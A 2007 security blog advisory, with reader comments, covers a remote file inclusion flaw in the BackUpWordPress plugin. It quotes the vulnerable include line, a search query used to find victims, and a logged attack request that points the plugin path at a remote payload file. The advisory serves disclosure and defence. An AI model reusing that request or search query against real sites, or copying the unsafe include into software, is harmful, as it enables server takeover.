BlogSecurity » Blog Archive » BackUpWordPress Remote File Include Vulnerability

BackUpWordPress Remote File Include Vulnerability

Filed Under (Advisories, Alerts, WordPress) by DK on 2 November 2007

A remote file include vulnerability has been found in BackupWordpress < 0.4.3.

This means if an attacker can execute code on your web server if they can access the following script directly:

http://[target]/_path]/plugins/BackUp/Archive.php

A proof of concept exploit has already been released into the wild. We suggest you upgrade as soon as possible.

Affected code:

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

A new version is available here.

It looks like attackers are already starting to query Google for affected web sites:

http://www.google.com.br/search?hl=pt-BR&client=firefox-a&
q="plugins/BackUp/Archive/"&btnG=Pesquisar&meta=

AND

209.190.23.66 - - [02/Nov/2007:11:51:14 +0000] "
GET /category/wordpress/articles//BackUp/Archive/Reader.php?
bkpwp_plugin_path=http://www.freewebtown.com/komandan/tool/q3.txt??
HTTP/1.1" 404 13951 "-" "libwww-perl/5.808"

Enjoy the article? Please take a second to: Digg it! | StumbleUpon it!

Comments

blogator.de » Blog Archive » Sicherheitslücke: BackUpWordPress on 2 November, 2007 at 1:02 pm #

[…] gibt es eine Sicherheitslücke in BackUpWordPress und passend dazu einen Exploit (Nur für Tests verwenden). Eine gefixt Version […]

BlogSecurity » Blog Archive » WordPress BlogWatch on 2 November, 2007 at 1:30 pm #

[…] Remote File Inclusion (more) […]

Philipp on 2 November, 2007 at 1:33 pm #

That’s awesome to see how fast attacker apply these new holes to their software…Not even as Security aware guy, you’re really safe from getting hit as you can’t react/check your plugins so often and fast…

DK on 2 November, 2007 at 3:08 pm #

Phil, indeed, although our htaccess guide would have prevented this attack.

Donncha O Caoimh on 2 November, 2007 at 3:52 pm #

Saw a few of those queries on my blog this morning. Luckily I don’t run that script!

alex on 2 November, 2007 at 3:54 pm #

I don’t like backup plugins because they often contain many security issues.

After a quick look, I found another security issue that allows the execution of SQL queries.

DK on 2 November, 2007 at 4:03 pm #

Donncha, check out http://blogsecurity.net/wordpress/article-210607/

These steps would have mitigated the risk of this attack :)

Alex, its a great plugin, but its new… perhaps we should get involved and sponser it.

Truden on 3 November, 2007 at 7:31 am #

First time to see someone saying “Nice plugin, let sponsor it.”
Made my day :)

Remote file inclusion encontrado no plugin BackupWordPress | Security Hub - Segurança da informação on 5 November, 2007 at 11:04 am #

[…] Blog Security. Gostou deste post? Então assine o feed RSS! Nos meus feeds você não lê só a introdução, […]

WordPress tuto a été hacké - Alerte sur BackupWordPress on 6 November, 2007 at 12:34 am #

[…] soit le plugin BackupWordPress car je l’avais installé pour le tester et d’après ce message de BlogSecurity, il était vulnérable ce […]

Comment

Search site:
Welcome to BlogSecurity
- BlogSec is the only organization that deals with social networking and web blog security exclusively.
- Meet the team
- Post/Read News
Secure WordPress
Recent Posts
What you enjoy on BlogSec
- Latest blog news and projects
- Details of recent vulnerabilities
- BlogSec security projects and related content
- Non-technical and general articles
View Results

Name:
Email:
Website:
Message:

Comments

Welcome to BlogSecurity

Secure WordPress

Recent Posts

What you enjoy on BlogSec

Additional WP Resources

Recent Comments

Posts by Category